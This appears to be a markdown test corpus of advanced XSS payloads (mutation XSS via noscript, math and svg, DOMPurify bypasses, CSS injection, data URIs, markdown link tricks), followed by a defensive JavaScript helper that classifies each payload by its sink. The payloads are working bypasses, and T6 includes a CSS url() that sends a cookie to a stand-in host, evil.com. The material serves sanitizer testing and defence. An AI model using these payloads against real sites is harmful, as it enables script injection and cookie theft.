---
language: en
license: mit
---
# Advanced XSS
## T1: mXSS via noscript
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
## T2: mXSS via math
<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(2)>
## T3: mXSS via svg/foreignObject
<svg><foreignObject><div><style><!--</style><img src=x onerror=alert(3)></div></foreignObject></svg>
## T4: DOMPurify bypass via namespace confusion
<svg><a><rect width="100" height="100"/><animate attributeName="href" values="javascript:alert(4)"/></a></svg>
## T5: DOMPurify bypass via use
<svg><use href="data:image/svg+xml,<svg id=x xmlns=http://www.w3.org/2000/svg><image href=1 onerror=alert(5) /></svg>#x" />
## T6: CSS injection
<p style="background:url(javascript:alert(6))">test</p>
<p style="background-image:url(https://evil.com/track?cookie=)">CSS exfil</p>
## T7: Custom protocol handler
<a href="hf://models/test">HF Protocol</a>
## T8: Form with formaction
<button formaction="javascript:alert(8)">test</button>
<input type="image" src=x onerror="alert(8)">
## T9: Anchor with data URI
<a href="data:text/html,<script>alert(9)</script>">Click</a>
## T10: Template and xmp elements
<template><script>alert(10)</script></template>
<xmp><script>alert(10)</script></xmp>
## T11: Markdown link tricks
[test](https://evil.com "onclick=alert(11)")
[test](https://evil.com" onclick="alert(11))
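Added example, not part of the original test file: a JavaScript triage helper that classifies each payload above by the sink it reaches (an `on*` event handler, a URL-bearing attribute with a non-allowlisted scheme, a CSS `url()`, a `<script>` element, or a context-dependent element such as `noscript`/`math`/`svg`/`xmp` whose content model changes between parsers). The scheme allowlist, the list of URL-bearing attributes and the `T6a`/`T6b` style IDs for two-line tests are assumptions made here. It is regex-based and meant only for scanning the corpus; it is not a sanitizer, which is exactly why the mXSS cases T1-T3 show up only through their context-dependent elements.

```javascript
// Added triage helper for the test corpus above (not part of the original
// file): it reports which XSS sink each payload reaches. It is regex-based
// and intended only for scanning a corpus; it is NOT a sanitizer. The mXSS
// cases (T1-T3) exist precisely because string inspection and real HTML
// parsing disagree, so those are only flagged as context-dependent.
// Assumed: the scheme allowlist and URL-attribute list below.

const SAFE_SCHEMES = new Set(["http", "https", "mailto"]);

// Decode the entity forms used to disguise a scheme (&#106;avascript:,
// &#x6a;avascript:, &Tab; &NewLine; &colon;). Code points above U+10FFFF
// are dropped instead of letting String.fromCodePoint throw on hostile input.
function decodeEntities(s) {
  const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "");
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&tab;/gi, "\t")
    .replace(/&newline;/gi, "\n")
    .replace(/&colon;/gi, ":");
}

// Mirror the URL parser's pre-processing: strip leading/trailing C0 controls
// and space, delete ASCII tab/newline anywhere, then read the scheme.
// Returns the lower-cased scheme, or null for a relative URL.
function urlScheme(raw) {
  const s = decodeEntities(raw)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// Allowlist, not denylist: a custom scheme such as hf: (T7) is rejected
// rather than accepted merely because it is not javascript:.
function isSafeUrl(raw) {
  const scheme = urlScheme(raw);
  return scheme === null || SAFE_SCHEMES.has(scheme);
}

// URL-bearing attributes. SMIL's values/from/to are included because
// <animate attributeName="href"> writes them into href (T4).
const URL_ATTRS = /\b(href|src|formaction|action|xlink:href|values|from|to)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
const CSS_URL = /url\(\s*(['"]?)([^)'"]*)\1\s*\)/gi;
// Elements whose content model depends on context (scripting flag, foreign
// content, raw text) and therefore need a parse/serialize/re-parse check.
const CONTEXT_ELEMENTS = /<(noscript|template|xmp|math|svg|foreignobject|style)\b/gi;

function findings(html) {
  const out = new Set();
  if (/[\s/]on[a-z]+\s*=/i.test(html)) out.add("event-handler");
  if (/<script\b/i.test(html)) out.add("script-element");
  for (const m of html.matchAll(URL_ATTRS)) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? "";
    const parts = name === "values" ? value.split(";") : [value]; // SMIL list
    for (const v of parts) if (!isSafeUrl(v)) out.add(`url:${name}=${urlScheme(v)}`);
  }
  for (const m of html.matchAll(CSS_URL)) {
    const scheme = urlScheme(m[2]);
    if (!isSafeUrl(m[2])) out.add(`css-url:${scheme}`);
    else if (scheme !== null) out.add("css-remote-fetch"); // any absolute url() in style leaks
  }
  for (const m of html.matchAll(CONTEXT_ELEMENTS)) out.add(`context:${m[1].toLowerCase()}`);
  return [...out].sort();
}

// The payload lines from this file, keyed by test number (a/b for two-line tests).
const PAYLOADS = {
  T1: '<noscript><p title="</noscript><img src=x onerror=alert(1)>">',
  T2: '<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(2)>',
  T3: '<svg><foreignObject><div><style><!--</style><img src=x onerror=alert(3)></div></foreignObject></svg>',
  T4: '<svg><a><rect width="100" height="100"/><animate attributeName="href" values="javascript:alert(4)"/></a></svg>',
  T5: '<svg><use href="data:image/svg+xml,<svg id=x xmlns=http://www.w3.org/2000/svg><image href=1 onerror=alert(5) /></svg>#x" />',
  T6a: '<p style="background:url(javascript:alert(6))">test</p>',
  T6b: '<p style="background-image:url(https://evil.com/track?cookie=)">CSS exfil</p>',
  T7: '<a href="hf://models/test">HF Protocol</a>',
  T8a: '<button formaction="javascript:alert(8)">test</button>',
  T8b: '<input type="image" src=x onerror="alert(8)">',
  T9: '<a href="data:text/html,<script>alert(9)</script>">Click</a>',
  T10a: '<template><script>alert(10)</script></template>',
  T10b: '<xmp><script>alert(10)</script></xmp>',
  T11a: '[test](https://evil.com "onclick=alert(11)")',
  T11b: '[test](https://evil.com" onclick="alert(11))',
};

function scanCorpus(payloads) {
  return Object.fromEntries(Object.entries(payloads).map(([id, p]) => [id, findings(p)]));
}

for (const [id, f] of Object.entries(scanCorpus(PAYLOADS))) {
  console.log(id.padEnd(5), f.join(", ") || "(no HTML sink before rendering)");
}
```

Run it with `node`. Two results are worth noting: T11a reports nothing, because raw markdown has no HTML sink until the renderer has produced `<a href="..." title="...">`, so the T11 checks belong on the renderer's output rather than its input; and T7 is rejected by the allowlist without anyone having had to list `hf:` as dangerous. For T1-T3 the flags are only a hint: the actual defence against mXSS is to serialize the sanitized DOM, re-parse it in the target context (scripting enabled, correct namespace) and compare the two trees.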